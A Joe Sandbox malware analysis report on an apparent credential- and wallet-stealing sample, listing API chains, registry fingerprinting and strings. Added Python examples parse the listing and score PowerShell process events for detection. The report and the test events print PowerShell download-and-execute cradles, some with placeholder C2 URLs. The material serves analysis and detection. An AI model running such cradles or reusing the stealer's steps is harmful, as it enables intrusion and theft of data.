                  • Instruction ID: bf75e267b24a55d6e94fc4aaaad23d767657d932b734e71f4e980dfafb790b36
                  • Opcode Fuzzy Hash: b6794f2f294954c878756eb2de0bb20f6e40f75ada013123eab3e499736f3f08
                  • Instruction Fuzzy Hash: 81F03A30908209EFD3589FE0B50AF2C7B74FF05703F0402ACE61A87284DA795A829BD5
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00FB4FCA
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00FB4FD1
                  • InternetOpenA.WININET(00FD0DDF,00000000,00000000,00000000,00000000), ref: 00FB4FEA
                  • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00FB5011
                  • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00FB5041
                  • InternetCloseHandle.WININET(?), ref: 00FB50B9
                  • InternetCloseHandle.WININET(?), ref: 00FB50C6
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                  • String ID:
                  • API String ID: 3066467675-0
                  • Opcode ID: 78851dbb05e316a93b3154b1d2f11d9a8e35b1269bdc614a0f91cac252af43f0
                  • Instruction ID: 8e4f2763b579c8e6fb8273620c7340c2ddc1f97efe29b7456092106bb28a5325
                  • Opcode Fuzzy Hash: 78851dbb05e316a93b3154b1d2f11d9a8e35b1269bdc614a0f91cac252af43f0
                  • Instruction Fuzzy Hash: F83107B5A00218ABDB24DF54DC85BDCB7B4EB48704F1081E9EA09A7284DB746AC59F98
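Added example, not part of this report or of the sample: a small parser for the API lines in this report that recognises the InternetOpenA, InternetOpenUrlA, InternetReadFile chain of the entry above and decodes the fifth argument of InternetOpenUrlA. The value 04000100 is INTERNET_FLAG_NO_CACHE_WRITE | INTERNET_FLAG_PRAGMA_NOCACHE (constants from wininet.h), so the fetch neither reuses nor populates the WinINet cache: do not expect INetCache entries for the payload URL on the host. The read size 00000400 is the 1024-byte chunk the loop pulls per InternetReadFile call. The sample input is the seven API lines of this entry; the argument columns in these listings are stack snapshots, so treat decoded values as indications, not proof.

```python
import re
from dataclasses import dataclass
from typing import Iterable, List, Optional

# One "APIs" line of a Joe Sandbox function entry, e.g.
#   • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00FB5011
#   • wsprintfA.USER32 ref: 00FC8459                       (no argument list)
#   • Part of subcall function 00FCA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00FCA7E6
_API_LINE = re.compile(
    r"(?P<name>[A-Za-z_]\w*)\.(?P<module>[A-Z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})"
)
_SUBCALL = re.compile(r"Part of subcall function ([0-9A-Fa-f]{8}):\s*")

# dwFlags bits of InternetOpenUrlA that matter for forensics (values from wininet.h).
WININET_FLAGS = {
    0x04000000: "INTERNET_FLAG_NO_CACHE_WRITE",
    0x00000100: "INTERNET_FLAG_PRAGMA_NOCACHE",
    0x80000000: "INTERNET_FLAG_RELOAD",
    0x00800000: "INTERNET_FLAG_SECURE",
}


@dataclass(frozen=True)
class ApiCall:
    name: str
    module: str
    args: tuple
    ref: int                    # address of the call site
    subcall_of: Optional[int]   # callee address when the line is "Part of subcall"


def parse_api_lines(lines: Iterable[str]) -> List[ApiCall]:
    calls = []
    for raw in lines:
        line = raw.strip().lstrip("•").strip()
        sub = None
        m_sub = _SUBCALL.search(line)
        if m_sub:
            sub = int(m_sub.group(1), 16)
            line = line[m_sub.end():]
        m = _API_LINE.search(line)
        if not m:
            continue  # header lines such as "APIs" or "Strings"
        args = tuple(a.strip() for a in (m.group("args") or "").split(",") if a.strip())
        calls.append(ApiCall(m.group("name"), m.group("module"), args,
                             int(m.group("ref"), 16), sub))
    return calls


def find_chain(calls: List[ApiCall], chain) -> Optional[List[int]]:
    """Call sites satisfying `chain` in code order (by ref); other calls may interleave."""
    want, hits = 0, []
    for c in sorted(calls, key=lambda c: c.ref):
        if c.subcall_of is None and c.name == chain[want]:
            hits.append(c.ref)
            want += 1
            if want == len(chain):
                return hits
    return None


def decode_flags(value: int, table=WININET_FLAGS) -> List[str]:
    return [name for bit, name in table.items() if value & bit]


def _hex_arg(call: ApiCall, index: int) -> Optional[int]:
    if len(call.args) > index and call.args[index] != "?":
        return int(call.args[index], 16)
    return None


def triage_wininet(lines: Iterable[str]) -> Optional[dict]:
    """Flag the download loop and decode how the URL is fetched; None if absent."""
    calls = parse_api_lines(lines)
    chain = find_chain(calls, ("InternetOpenA", "InternetOpenUrlA", "InternetReadFile"))
    if chain is None:
        return None
    open_url = next(c for c in calls if c.name == "InternetOpenUrlA")
    read = next(c for c in calls if c.name == "InternetReadFile")
    flags = _hex_arg(open_url, 4) or 0        # 5th parameter: dwFlags
    return {"chain_refs": chain,
            "flags": decode_flags(flags),
            "read_chunk": _hex_arg(read, 2)}  # 3rd parameter: dwNumberOfBytesToRead


# Sample input: the API lines of the entry above, copied from this report.
SAMPLE = """
• GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00FB4FCA
• RtlAllocateHeap.NTDLL(00000000), ref: 00FB4FD1
• InternetOpenA.WININET(00FD0DDF,00000000,00000000,00000000,00000000), ref: 00FB4FEA
• InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00FB5011
• InternetReadFile.WININET(?,?,00000400,00000000), ref: 00FB5041
• InternetCloseHandle.WININET(?), ref: 00FB50B9
• InternetCloseHandle.WININET(?), ref: 00FB50C6
""".strip().splitlines()

if __name__ == "__main__":
    print(triage_wininet(SAMPLE))
```

Feed it the "APIs" lines of any entry in this report; entries without the full chain return None, so a loop over all entries yields only the functions that actually fetch from the network.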
                  APIs
                  • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00FC8426
                  • wsprintfA.USER32 ref: 00FC8459
                  • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00FC847B
                  • RegCloseKey.ADVAPI32(00000000), ref: 00FC848C
                  • RegCloseKey.ADVAPI32(00000000), ref: 00FC8499
                    • Part of subcall function 00FCA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00FCA7E6
                  • RegQueryValueExA.ADVAPI32(00000000,00C8E140,00000000,000F003F,?,00000400), ref: 00FC84EC
                  • lstrlen.KERNEL32(?), ref: 00FC8501
                  • RegQueryValueExA.ADVAPI32(00000000,00C8DEA0,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00FD0B34), ref: 00FC8599
                  • RegCloseKey.ADVAPI32(00000000), ref: 00FC8608
                  • RegCloseKey.ADVAPI32(00000000), ref: 00FC861A
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                  • String ID: %s\%s
                  • API String ID: 3896182533-4073750446
                  • Opcode ID: 6e79f133d0271ac4b03d537eae4a36bb6873edd220c28fbc7d9adb41f3eb977e
                  • Instruction ID: a0f56f12b7bafc7a6723ede84cd0815d23656aed3b10fdc6d536dc5ab5ac88c8
                  • Opcode Fuzzy Hash: 6e79f133d0271ac4b03d537eae4a36bb6873edd220c28fbc7d9adb41f3eb977e
                  • Instruction Fuzzy Hash: F321F671900218ABDB28DB54DD85FE9B3B8FF48710F0081A9A609A7180DF75AA86DF94
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00FC76A4
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00FC76AB
                  • RegOpenKeyExA.ADVAPI32(80000002,00C7C4A8,00000000,00020119,00000000), ref: 00FC76DD
                  • RegQueryValueExA.ADVAPI32(00000000,00C8E128,00000000,00000000,?,000000FF), ref: 00FC76FE
                  • RegCloseKey.ADVAPI32(00000000), ref: 00FC7708
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                  • String ID: Windows 11
                  • API String ID: 3225020163-2517555085
                  • Opcode ID: 75b613ee5e58426824e5107e93271ce694a4564e5babf4d62aa56dde8f58a476
                  • Instruction ID: b1cde68706288d3a1ac3c1337e2e66bc3273b450f7a8a01b84dc80f77cb100a5
                  • Opcode Fuzzy Hash: 75b613ee5e58426824e5107e93271ce694a4564e5babf4d62aa56dde8f58a476
                  • Instruction Fuzzy Hash: 2B018FB5A04309BBD714EBE0E94AF69B7B8EF48701F00406CFA19D7284D6B8A9409F50
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00FC7734
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00FC773B
                  • RegOpenKeyExA.ADVAPI32(80000002,00C7C4A8,00000000,00020119,00FC76B9), ref: 00FC775B
                  • RegQueryValueExA.ADVAPI32(00FC76B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 00FC777A
                  • RegCloseKey.ADVAPI32(00FC76B9), ref: 00FC7784
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                  • String ID: CurrentBuildNumber
                  • API String ID: 3225020163-1022791448
                  • Opcode ID: fae3a863ae4e7840138d1a73af95a7e73b391f07716f227c5717ea9ff7f39994
                  • Instruction ID: fda3c497a9e31a172258c22a7ec3b588f8c14ddf4bbdc89e07348c5728351167
                  • Opcode Fuzzy Hash: fae3a863ae4e7840138d1a73af95a7e73b391f07716f227c5717ea9ff7f39994
                  • Instruction Fuzzy Hash: 1F0144B5A40308BBD714DBE0EC4AFAEB7B8EF48701F00416DFA19A7285DAB565408B51
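Added example, not part of this report or of the sample: the OS fingerprint the two registry functions above perform, with the argument values decoded. 80000002 is HKEY_LOCAL_MACHINE and 00020119 is KEY_READ | KEY_WOW64_64KEY, so this 32-bit process deliberately opens the 64-bit registry view. The key path (00C7C4A8) and the first value name (00C8E128) are not resolved in the listing; the example assumes SOFTWARE\Microsoft\Windows NT\CurrentVersion and ProductName, since CurrentBuildNumber lives in that key. The reason a stealer reads both values: on Windows 11 the ProductName value still begins with "Windows 10", so the "Windows 11" string can only be decided from a build number of 22000 or higher. The fallback pair used off Windows is constructed.

```python
import sys
from typing import List, Optional, Tuple

# Assumed key and value names (not resolved in the listing); see lead-in.
CURRENT_VERSION_KEY = r"SOFTWARE\Microsoft\Windows NT\CurrentVersion"

# Registry access masks (winnt.h).
KEY_READ, KEY_WRITE, KEY_ALL_ACCESS = 0x20019, 0x20006, 0xF003F
KEY_WOW64_64KEY, KEY_WOW64_32KEY = 0x0100, 0x0200


def decode_sam(sam: int) -> List[str]:
    """Name the samDesired mask passed to RegOpenKeyExA (0x20119 in the listing)."""
    names = []
    for mask, name in ((KEY_ALL_ACCESS, "KEY_ALL_ACCESS"),
                       (KEY_READ, "KEY_READ"), (KEY_WRITE, "KEY_WRITE")):
        if sam & mask == mask:
            names.append(name)
            sam &= ~mask
    if sam & KEY_WOW64_64KEY:
        names.append("KEY_WOW64_64KEY")
    if sam & KEY_WOW64_32KEY:
        names.append("KEY_WOW64_32KEY")
    return names


def classify_windows(product_name: str, current_build: str) -> str:
    """Name the OS from ProductName and CurrentBuildNumber.

    ProductName alone cannot distinguish Windows 11 (it still reads "Windows 10 ...");
    builds 22000+ are Windows 11, builds 10240+ Windows 10, older ones are named
    by ProductName. A check that only matched the literal "Windows 11" against
    ProductName would never fire on a real Windows 11 host.
    """
    try:
        build = int(current_build)
    except ValueError:
        return product_name or "unknown"
    if build >= 22000:
        return "Windows 11"
    if build >= 10240:
        return "Windows 10"
    return product_name or "unknown"


def read_current_version() -> Optional[Tuple[str, str]]:
    """Read both values through the 64-bit view, as the sample does; None off Windows."""
    if sys.platform != "win32":
        return None
    import winreg
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, CURRENT_VERSION_KEY, 0,
                        KEY_READ | KEY_WOW64_64KEY) as key:
        product, _ = winreg.QueryValueEx(key, "ProductName")
        build, _ = winreg.QueryValueEx(key, "CurrentBuildNumber")
    return str(product), str(build)


def host_os_name() -> str:
    """What the sample would report for this host (constructed pair off Windows)."""
    values = read_current_version() or ("Windows 10 Pro", "22631")
    return classify_windows(*values)


if __name__ == "__main__":
    print(decode_sam(0x20119), host_os_name())
```

The same decode applies to the other RegOpenKeyExA calls in this report: 00020019 at 00FC847B is plain KEY_READ, and 80000001 at 00FC40F4 is HKEY_CURRENT_USER.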
                  APIs
                  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00FB99EC
                  • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00FB9A11
                  • LocalAlloc.KERNEL32(00000040,?), ref: 00FB9A31
                  • ReadFile.KERNEL32(000000FF,?,00000000,00FB148F,00000000), ref: 00FB9A5A
                  • LocalFree.KERNEL32(00FB148F), ref: 00FB9A90
                  • CloseHandle.KERNEL32(000000FF), ref: 00FB9A9A
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                  • String ID:
                  • API String ID: 2311089104-0
                  • Opcode ID: 7ee98bfbb9c8651efb1669a9693e4432d7089b52c4d57a15c30d65af3cd732dc
                  • Instruction ID: 43a6e8938df574d92546ac7bce625e0e450e6e1e46110fc13c804e3c9ddeb89c
                  • Opcode Fuzzy Hash: 7ee98bfbb9c8651efb1669a9693e4432d7089b52c4d57a15c30d65af3cd732dc
                  • Instruction Fuzzy Hash: 8C313874E00209EFDB24CF95D985BEE77B8FF48310F108158E915A7290D778A981DFA0
                  APIs
                  • lstrcat.KERNEL32(?,00C8E2D8), ref: 00FC47DB
                    • Part of subcall function 00FC8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00FC8E0B
                  • lstrcat.KERNEL32(?,00000000), ref: 00FC4801
                  • lstrcat.KERNEL32(?,?), ref: 00FC4820
                  • lstrcat.KERNEL32(?,?), ref: 00FC4834
                  • lstrcat.KERNEL32(?,00C7B6F8), ref: 00FC4847
                  • lstrcat.KERNEL32(?,?), ref: 00FC485B
                  • lstrcat.KERNEL32(?,00C8DB60), ref: 00FC486F
                    • Part of subcall function 00FCA740: lstrcpy.KERNEL32(00FD0E17,00000000), ref: 00FCA788
                    • Part of subcall function 00FC8D90: GetFileAttributesA.KERNEL32(00000000,?,00FB1B54,?,?,00FD564C,?,?,00FD0E1F), ref: 00FC8D9F
                    • Part of subcall function 00FC4570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00FC4580
                    • Part of subcall function 00FC4570: RtlAllocateHeap.NTDLL(00000000), ref: 00FC4587
                    • Part of subcall function 00FC4570: wsprintfA.USER32 ref: 00FC45A6
                    • Part of subcall function 00FC4570: FindFirstFileA.KERNEL32(?,?), ref: 00FC45BD
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                  • String ID:
                  • API String ID: 2540262943-0
                  • Opcode ID: 8ccbb2d8bc453ae06a491ae7e70d234e8717f10a234968b7cde7f9928335610b
                  • Instruction ID: 392d0424c6bce28536623997a32818de49cf7719c1bd493ef9d0674759ebb8e1
                  • Opcode Fuzzy Hash: 8ccbb2d8bc453ae06a491ae7e70d234e8717f10a234968b7cde7f9928335610b
                  • Instruction Fuzzy Hash: 993162B690021857CB24F7A0DC86FE97378AF48700F40459DB31996081EEB8A6C99B95
                  APIs
                    • Part of subcall function 00FCA740: lstrcpy.KERNEL32(00FD0E17,00000000), ref: 00FCA788
                    • Part of subcall function 00FCA9B0: lstrlen.KERNEL32(?,00C89158,?,\Monero\wallet.keys,00FD0E17), ref: 00FCA9C5
                    • Part of subcall function 00FCA9B0: lstrcpy.KERNEL32(00000000), ref: 00FCAA04
                    • Part of subcall function 00FCA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00FCAA12
                    • Part of subcall function 00FCA920: lstrcpy.KERNEL32(00000000,?), ref: 00FCA972
                    • Part of subcall function 00FCA920: lstrcat.KERNEL32(00000000), ref: 00FCA982
                    • Part of subcall function 00FCA8A0: lstrcpy.KERNEL32(?,00FD0E17), ref: 00FCA905
                  • ShellExecuteEx.SHELL32(0000003C), ref: 00FC2D85
                  Strings
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00FC2D04
                  • ')", xrefs: 00FC2CB3
                  • <, xrefs: 00FC2D39
                  • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00FC2CC4
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                  • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  • API String ID: 3031569214-898575020
                  • Opcode ID: 7a15d8216b0de56d73d5b2bebbf0024ae6be9926345dcf1122c117e22b5cb2cb
                  • Instruction ID: 5e1e31676f812e5342e52b0100bfb55643f9d54a64d1cb1e9c842e00c58fd3a9
                  • Opcode Fuzzy Hash: 7a15d8216b0de56d73d5b2bebbf0024ae6be9926345dcf1122c117e22b5cb2cb
                  • Instruction Fuzzy Hash: 3341B97181020D9BDB18EBA0DD97FEDB774AF10304F40411DE016AA1D1EF786A4AEF96
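Added example, not part of this report or of the sample: detection logic for the process-creation event the entry above produces. The sample assembles C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (the 32-bit host, because file.exe is a 32-bit process) followed by -nop -c "iex(New-Object Net.WebClient).DownloadString('<url>')" and launches it with ShellExecuteEx; the URL is not resolved in the listing. The five Sysmon Event ID 1 style records below are constructed, with placeholder URLs, so the script runs offline; the scoring counts the cradle itself, the quiet switches, and a 32-bit PowerShell host started from a user-writable path, and the last two records show why fetch-only and script-file invocations stay below the threshold.

```python
import re
from typing import Dict, List

# Indicators applied to the command line; the verdict is the sum of the weights.
INDICATORS = [
    # Remote-script execution: an expression evaluator and a fetch primitive together.
    (3, "download-and-execute cradle",
     re.compile(r"(?=.*\b(?:iex|invoke-expression)\b)"
                r"(?=.*(?:net\.webclient|downloadstring|downloadfile|invoke-webrequest|\biwr\b))",
                re.I | re.S)),
    (1, "remote fetch primitive",
     re.compile(r"net\.webclient|downloadstring|downloadfile|invoke-webrequest|\biwr\b", re.I)),
    (1, "quiet/bypass switches",
     re.compile(r"(?:^|\s)-(?:nop|noprofile|noni|nologo|w(?:indowstyle)?\s+hidden"
                r"|ep\s+bypass|executionpolicy\s+bypass)\b", re.I)),
]
POWERSHELL_IMAGE = re.compile(r"\\(?:windowspowershell\\v1\.0\\powershell|pwsh)\.exe$", re.I)
WOW64_POWERSHELL = re.compile(r"^[a-z]:\\windows\\syswow64\\windowspowershell\\", re.I)
USER_WRITABLE_PARENT = re.compile(r"^[a-z]:\\(?:users\\|programdata\\|windows\\temp\\)", re.I)
ALERT_THRESHOLD = 3

# Constructed process-creation records (Sysmon Event ID 1 fields). URLs are placeholders.
EVENTS: List[Dict[str, str]] = [
    # 1. What this sample spawns: the 32-bit host with the cradle.
    {"ParentImage": r"C:\Users\user\Desktop\file.exe",
     "Image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'''"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -nop -c "iex(New-Object Net.WebClient).DownloadString('http://c2.example.invalid/p.ps1')"'''},
    # 2. Same cradle, different casing and switches, 64-bit host.
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'''powershell.exe -w hidden -NoProfile -Command "IEX (New-Object Net.WebClient).DownloadString('https://c2.example.invalid/q.ps1')"'''},
    # 3. Admin script: quiet switches but no remote code.
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1'},
    # 4. Download without execution: worth logging, below the alert threshold.
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'''powershell.exe -c "Invoke-WebRequest https://updates.example.invalid/x.zip -OutFile x.zip"'''},
    # 5. Not PowerShell at all.
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /c dir"},
]


def score_event(ev: Dict[str, str]) -> Dict:
    image, parent, cmd = ev.get("Image", ""), ev.get("ParentImage", ""), ev.get("CommandLine", "")
    if not POWERSHELL_IMAGE.search(image):
        return {"score": 0, "reasons": [], "alert": False}
    score, reasons = 0, []
    for weight, label, rx in INDICATORS:
        if rx.search(cmd):
            score += weight
            reasons.append(label)
    if WOW64_POWERSHELL.match(image) and USER_WRITABLE_PARENT.match(parent):
        score += 1
        reasons.append("32-bit PowerShell host launched from a user-writable path")
    return {"score": score, "reasons": reasons, "alert": score >= ALERT_THRESHOLD}


def detect(events: List[Dict[str, str]]) -> List[Dict]:
    findings = []
    for i, ev in enumerate(events):
        verdict = score_event(ev)
        if verdict["alert"]:
            findings.append({"index": i, "image": ev["Image"], **verdict})
    return findings


if __name__ == "__main__":
    for f in detect(EVENTS):
        print(f"[{f['score']}] event {f['index']}: {', '.join(f['reasons'])}")
```

Because the parent is file.exe rather than explorer.exe or a console, the parent-image field is usually the stronger pivot in a real hunt; the command-line regexes are what survives when the launcher has a different name.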
                  APIs
                  • LocalAlloc.KERNEL32(00000040,?), ref: 00FB9F41
                    • Part of subcall function 00FCA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00FCA7E6
                    • Part of subcall function 00FCA740: lstrcpy.KERNEL32(00FD0E17,00000000), ref: 00FCA788
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$AllocLocal
                  • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                  • API String ID: 4171519190-1096346117
                  • Opcode ID: 45f4ba0421dfe0b0d45fff59a6b044177ba28fb74ffe88e32952d41645fc48bc
                  • Instruction ID: 097aaa39ada23faf06523a242081f854b2943450ffc55fe72d555b5143dedac0
                  • Opcode Fuzzy Hash: 45f4ba0421dfe0b0d45fff59a6b044177ba28fb74ffe88e32952d41645fc48bc
                  • Instruction Fuzzy Hash: C5614C71A0020CABDB24EFA5CD96FED7775BF44344F048118F90A5B281EB78AA05EF52
                  APIs
                  • RegOpenKeyExA.ADVAPI32(80000001,00C8DAA0,00000000,00020119,?), ref: 00FC40F4
                  • RegQueryValueExA.ADVAPI32(?,00C8E320,00000000,00000000,00000000,000000FF), ref: 00FC4118
                  • RegCloseKey.ADVAPI32(?), ref: 00FC4122
                  • lstrcat.KERNEL32(?,00000000), ref: 00FC4147
                  • lstrcat.KERNEL32(?,00C8E338), ref: 00FC415B
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  • Associated: 00000000.00000002.1714174137.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714191818.0000000001061000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714191818.000000000106D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714191818.0000000001092000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714191818.00000000011FA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.000000000120E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.0000000001398000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.000000000146E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.0000000001492000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.0000000001499000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.00000000014A8000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714621077.00000000014A9000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714730643.0000000001643000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714747116.0000000001644000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$CloseOpenQueryValue
                  • String ID:
                  • API String ID: 690832082-0
                  • Opcode ID: 2cd82810e82c479980ea2231c776630473e7ff67576512994c63e66879f8f152
                  • Instruction ID: 89ddc70a09cffd65d42c840033be18a837175423143535cb83d7445ffda984d5
                  • Opcode Fuzzy Hash: 2cd82810e82c479980ea2231c776630473e7ff67576512994c63e66879f8f152
                  • Instruction Fuzzy Hash: BF41EAB6D001086BDB28EBA0EC57FED373CBB48340F44455CB62957185EA795BC88BE1
                  APIs
                  • GetSystemTime.KERNEL32(?), ref: 00FC696C
                  • sscanf.NTDLL ref: 00FC6999
                  • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00FC69B2
                  • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00FC69C0
                  • ExitProcess.KERNEL32 ref: 00FC69DA
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  • Associated: 00000000.00000002.1714174137.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714191818.0000000001061000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714191818.000000000106D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714191818.0000000001092000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714191818.00000000011FA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.000000000120E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.0000000001398000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.000000000146E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.0000000001492000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.0000000001499000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.00000000014A8000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714621077.00000000014A9000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714730643.0000000001643000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714747116.0000000001644000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Time$System$File$ExitProcesssscanf
                  • String ID:
                  • API String ID: 2533653975-0
                  • Opcode ID: b08c64b4e23dcdb9214faf6ae1e26ff99f84427d8fe895844db4b5e745dcf543
                  • Instruction ID: 0013c20cde79ceeb0cf974ae05ffa057f2f4fda2db9d2775cac92aff22e90b31
                  • Opcode Fuzzy Hash: b08c64b4e23dcdb9214faf6ae1e26ff99f84427d8fe895844db4b5e745dcf543
                  • Instruction Fuzzy Hash: 2821EC75D04209ABCF08EFE4E946AEEB7B5BF48300F04852EE41AE3244EB346605CB65
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00FC7E37
